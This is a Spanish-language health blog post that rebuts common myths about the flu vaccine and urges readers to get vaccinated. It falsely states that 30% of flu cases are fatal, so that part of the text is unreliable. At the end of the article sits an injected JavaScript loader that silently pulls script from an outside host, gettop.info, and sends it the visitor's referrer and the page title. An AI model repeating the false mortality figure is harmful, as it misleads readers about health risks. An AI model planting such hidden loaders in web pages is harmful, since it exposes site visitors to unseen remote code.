Salud y belleza » Medicina, Salud

Vacuna contra la gripe: mitos

Sin Comentarios

vacuna-gripeComienza el otoño, el frío, las lluvias… y por desgracia llega la gripe, un virus muy difícil de tratar puesto que los medicamentos solo tienen efecto en los inicios de la infección, suelen ser caros y de efectividad limitada. Por eso es tan importante vacunarse de la gripe, para prevenir. Además, el 30% de los casos son mortales.

El coste de tratar la gripe es mucho mayor que el de ponerse una vacuna. Los expertos critican que muchas personas no valoren suficientemente estas inyecciones puesto que son un gran avance médico.

Pero alrededor de la vacuna de la gripe se han creado falsos mitos, una serie de leyendas urbanas que en la mayoría de los casos, si no en todos, son falsos.

Por ejemplo están quienes dicen que la vacuna impide que el sistema inmune luche con la infección, cuando en realidad produce lo contrario, ayuda al sistema inmune a protegernos contra el virus. Muchos afirman que la vacuna provoca la gripe, pero no puede ser que con una vacuna de un virus muerto se contraiga esta enfermedad.

Muchas personas creen que son muy fuertes y que por eso están protegidos, pero cualquier persona puede contraer la gripe. La vacuna de la gripe tampoco tiene efectos adversos graves, normalmente tiene efectos como enrojecimiento en la zona del pinchazo, pero nada más.

Por tanto no hay que dudarlo, vacunarse de la gripe puede evitar que pasemos un mal trance por culpa de una enfermedad que es difícil de curar y que puede llegar a ser mortal.

¿Te has vacunado o te vas a vacunar de la gripe?var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza :

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.